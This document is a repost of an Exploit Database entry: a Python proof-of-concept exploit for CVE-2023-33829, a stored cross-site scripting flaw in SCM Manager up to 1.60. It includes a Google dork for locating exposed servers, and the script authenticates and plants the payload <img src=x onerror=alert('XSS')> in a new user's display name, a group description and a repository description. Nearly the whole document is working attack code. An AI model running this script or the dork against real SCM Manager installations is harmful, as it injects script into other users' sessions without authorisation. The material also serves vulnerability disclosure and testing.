SCM Manager 1.60 – Cross-Site Scripting Stored (Authenticated)

• Exploit Database
• 18 阅读

• 作者： neg0x
  日期： 2023-05-25
• 类别：

  • webapps
  平台：

  • multiple
• 来源：https://www.exploit-db.com/exploits/51488/

• #!/usr/bin/python3
  
  # Exploit Title: SCM Manager 1.60 - Cross-Site Scripting Stored (Authenticated)
  # Google Dork: intitle:"SCM Manager" intext:1.60
  # Date: 05-25-2023
  # Exploit Author: neg0x (https://github.com/n3gox/CVE-2023-33829)
  # Vendor Homepage: https://scm-manager.org/
  # Software Link: https://scm-manager.org/docs/1.x/en/getting-started/
  # Version: 1.2 <= 1.60
  # Tested on: Debian based
  # CVE: CVE-2023-33829
  
  # Modules
  import requests
  import argparse
  import sys
  
  # Main menu
  parser = argparse.ArgumentParser(description='CVE-2023-33829 exploit')
  parser.add_argument("-u", "--user", help="Admin user or user with write permissions")
  parser.add_argument("-p", "--password", help="password of the user")
  args = parser.parse_args()
  
  
  # Credentials
  user = sys.argv[2]
  password = sys.argv[4]
  
  
  # Global Variables
  main_url = "http://localhost:8080/scm" # Change URL if its necessary
  auth_url = main_url + "/api/rest/authentication/login.json"
  users = main_url + "/api/rest/users.json"
  groups = main_url + "/api/rest/groups.json"
  repos = main_url + "/api/rest/repositories.json"
  
  # Create a session
  session = requests.Session()
  
  # Credentials to send
  post_data={
  	'username': user, # change if you have any other user with write permissions
  	'password': password # change if you have any other user with write permissions
  }
  
  r = session.post(auth_url, data=post_data)
  
  if r.status_code == 200:
  	print("[+] Authentication successfully")
  else:
  	print("[-] Failed to authenticate")
  	sys.exit(1)
  
  new_user={
  
  	"name": "newUser",
  	"displayName": "<img src=x onerror=alert('XSS')>",
  	"mail": "",
  	"password": "",
  	"admin": False,
  	"active": True,
  	"type": "xml"
  
  }
  
  create_user = session.post(users, json=new_user)
  print("[+] User with XSS Payload created")
  
  new_group={
  
  	"name": "newGroup",
  	"description": "<img src=x onerror=alert('XSS')>",
  	"type": "xml"
  
  }
  
  create_group = session.post(groups, json=new_group)
  print("[+] Group with XSS Payload created")
  
  new_repo={
  
  	"name": "newRepo",
  	"type": "svn",
  	"contact": "",
  	"description": "<img src=x onerror=alert('XSS')>",
  	"public": False
  
  }
  
  create_repo = session.post(repos, json=new_repo)
  print("[+] Repository with XSS Payload created")